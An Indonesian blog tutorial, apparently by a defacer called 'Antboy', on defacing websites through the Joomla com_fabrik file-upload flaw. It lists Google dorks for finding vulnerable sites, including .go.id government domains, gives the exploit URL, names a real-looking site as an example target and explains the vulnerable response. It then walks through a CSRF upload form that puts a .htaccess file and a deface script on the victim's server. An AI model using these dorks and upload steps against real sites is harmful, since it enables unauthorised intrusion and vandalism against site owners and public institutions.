Tutorial Deface Metode Com_Fabrik

Hai Semua, selamat datang di blog KUMPULAN TUTORIAL DEFACE 2020-2021 VERSI ./ANTBOY, Pada Artikel yang kalian baca kali ini dengan judul Tutorial Deface Metode Com_Fabrik dan Cara Tebas index Web, Antboy telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang Antboy tulis ini dapat kalian pahami:). baiklah, selamat membaca:)


Ok kita lanjut aja ke tutorialnya:)

Cara Deface Metode Com_Fabrik dan Cara Tebas index Web :

1. Dorking terlebih dahulu dengan dork inurl:viewTable?cid= site:com 
inurl:/com_fabrik site:go.id
inurl:index.php?option=com_fabrik site:
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
jangan lupa di kembangin lagi dorknya 
2. Pilih salah satu web untuk jadikan korban :v
3. Untuk mengecek webnya vuln atau tidak silakan masukkan expolitnya(exploit dan dork menjadi 1 difile txt)
4. Disini saya sudah menentukan target, untuk mengetahui vuln atau tidaknya sebuah web target silakan masukkan exploit.
5. Cara memasukkan exploit di web target :
Contoh target : http://www.rwrottemeren.nl/
untuk memasukkan exploit tambahkan exploit ke belakang url domain.
6. Exploit nya /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Contoh Url asli : http://www.rwrottemeren.nl/ 
Url diexploit : http://www.rwrottemeren.nl/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

7. Jika web tersebut vuln maka akan muncul tulisan seperti ini : {"filepath":null,"uri":null}


8. Buka file CSRF Antboy.txt,edit text didalam file CSRF Antboy.txt menggunakan nptepad,notepad plus atau apapun itu terserah kalian:),kalau kalian belum punya ntar Antboy Kasih CSRF-nya.

9.Nanti akan seperti digambar ini, fokus ke tulisan text disitu tulisannya "link target" sekarang ubah menjadi link web target.

10. Buka file CSRF CSRF.html nya, maka nanti hasilnya seperti gambar dibawah ini
11. Sekarang klik "Choose File" terus pilih file .htaccess
12. Kemudian klik "Tusbol Kimaq"
13. Yesss, berhasil. Jika berhasil maka akan tampil seperti gambar dibawah ini.

14. Sekarang waktunya kita tebas index web target :v
15. Jika belum punya script deface silakan Silahkan download untuk download script CSRF
16. Buka lagi file CSRF CSRF.html
17. Kemudian klik "Choose File" terus pilih file file script deface kalian terus klik "Upload"
18. Jika berhasil selamat website tersebut telah di deface:v

Sekian terimakasih bila Kalian Belum Paham juga silahkan Hubungi Antboy Dibawah ini


Catatan: Jika web target kalian tidak bisa diupload .htaccess langsung aja upload script deface milik kalian



Komentar

Postingan Populer